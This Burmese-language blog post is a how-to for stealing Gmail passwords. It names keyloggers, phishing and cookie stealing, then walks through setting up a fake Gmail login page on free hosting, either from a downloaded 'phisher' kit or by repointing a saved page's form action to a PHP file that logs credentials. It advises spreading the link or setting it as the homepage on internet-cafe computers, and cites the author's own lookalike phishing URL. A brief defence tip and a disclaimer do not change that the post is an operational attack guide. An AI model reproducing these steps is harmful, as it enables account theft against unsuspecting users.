gmail ကိုဟက္လို႕တကယ္ရပါသလား။ရပါတယ္လိ
gmail hacking လုပ္မယ္ဆိုရင္
1.keylogger
2.Phishing method
3.cookies stealing
စတာေတြနဲ႕ လုပ္ရမွာပါ။
ဒီထဲမွာ အသံုးအမ်ားဆံုးကေတာ့ Phishing method ျဖစ္ပါတယ္။
Phishing method ဆိုတာ gmail login page အတုလုပ္တာပါ။
ေအာက္ပါလင့္ေန gmail phisher ေလးကိုေဒါင္းလိုက္ပါ။
http://www.ziddu.com/download/
ျပးီရင္ free hosting site မွာ အေကာင့္တစ္ခုဖြင့္လိုက္ပါ။ေအာက္
http://www.ripway.com
အဲဒီမွာအေကာင့္လုပ္ျပီး ခုနက ေဒါင္းထားတဲ့ ဖိုင္ ၃ ဖိုင္ကို upload လုပ္လိုက္ပါ။
ျပီးရင္ ေအာက္ပါအတိုင္းျမင္ရပါလိမ့္မယ္။
အေပၚဆံုးက http://h1.ripway.com/htetnyi/
ကၽြန္ေတာ္ကေတာ့ ကၽြန္ေတာ္ ့gmail အေကာင့္နဲ႕စမ္းျပထားပါတယ္။ အဲဒီအတု စာမ်က္ႏွာမွာ login ၀င္ျပီးေတာ့စမ္းျပထားတာပါ။
အဲဒီလိုအေကာင့္၀င္ျပီးေတာ့ သင္ hosting တင္တားတဲ့ log.txt ဖိုင္ထဲမွာ ခုနက gmail login ၀င္ထားတဲ့ password ကိုျမင္ရပါလိမ့္မယ္။ log.txt ဖိုင္ေအာက္က edit ထဲကို၀င္ၾကည့္ပါ ။ ေအာက္မွာပံုနဲ႕ေဖာ္ျပထားပါတယ္။
ကဲ ဒါကိုဘယ္လိုေနရာမွသံုးမလဲ။
online ေပၚမွာဆိုရင္ ကိုယ့္ gmail အတု လင့္ကို သူမ်ားေတြကိုေပးျခင္း။
အင္တာနက္ ကဖီးေတြမွာဆိုရင္ firefox မွာ ကို့္လင့္ကို homepage ေပးထားျခင္းျဖင့္သံုးႏိုင္ပါတယ္
ဘယ္လိုကာကြယ္မလဲ အရင္ ဆံုး ကိုယ္ကေမးသံုးမယ္ဆို အရင္ ဆံုး site address ကို အရင္စစ္ပါ။
သူမ်ားေပးတဲ့လင့္တိုင္း မ၀င္ရ။
ကိုယ္၀င္လင့္တိုင္းကိုစစ္ေဆး ျခင္းျဖင့္အလြယ္တကူကာကြယ္ႏိူင္
ဒါကေနာက္ထပ္ဟို ့တခုမွာသူငယ္ခ်င္းတေယာက္တင္ထားတာေလးပါ ဗဟုသုတအျဖစ္ထည့္ေပးတာပါ..
000 webhosts မွာ အေကာင့္သြားလုပ္လိုက္ေလ။ FTP account.
ၿပီးရင္ html နဲ ့php ဖုိင္ကို upload လုပ္လိုက္။
အေကာင္းဆံုးနည္းလမ္းက -
- လက္ရွိ အသစ္ၿဖစ္သြားတဲ့ Gmail page ကို Save လုပ္လိုက္။
- ၿပီးရင္ Notepad နဲ ့ဖြင့္ၿပီး action ဆိုတဲ ့ေနရာမွာ ကို္ယ့္ ရဲ့ php ဖုိင္နာမည္ကို ထည့္လိုက္။
Example : <form id=”gaia_loginform” action=”explore.php” method=”post”>
(explore.php ဆုိတာက ကိုယ့္ရ့ဲ php ဖိုင္နာမည္ေပါ့)
- ေနာက္ၿပီးသြားရင္ FTP Server ရဲ့ Public_Html folder ေအာက္မွာ ServiceLogin.html, ServiceLogin_Files, explore.pho
သံုးခုကိုတင္လိုက္။
ဒါဆိုရၿပီ။ ကိုယ့္ Gmail page အတု လိပ္စာကို ေပးၿပီး သူ Sign In လုပ္မွာကို သာထိုင္ေစာင့္ေနေပေတာ့။
000webhost မွာတစ္ခုေကာင္းတာက Address က နည္းနည္း ဆင္တူရိုးမွားလုပ္လို ့ရတယ္။
ဥပမာေပးရရင္ ကၽြန္ေတာ့္ Phishing page က
http://gmail-authentication.netai.net/ServiceLogin.htm/
(အဲ့မွာ သြားၿပီး ခင္ဗ်ား အေကာင့္ကိုရိုက္ထည့္လိုက္ရင္ က်ဳပ္ဆီ ေရာက္ၿပီေပါ့ဗ်ာ။ မယံုရင္ စမ္းၾကည့္ေလ
တစ္ခုေၿပာခ်င္တာက ဒီနည္းက လွည့္စားဖို ့၊ မသမာမႈေတြ လုပ္ဖို ့အတြက္ မရည္ရြယ္ပါဘူး။
မတတ္သာတဲ့ အေၿခအေနေတြမွာ သံုးဖို ့နဲ ့ကိုယ့္ကိုကိုယ္ ကာကြယ္ဖို ့ပဲရည္ရြယ္တာပါ။
No comments:
Post a Comment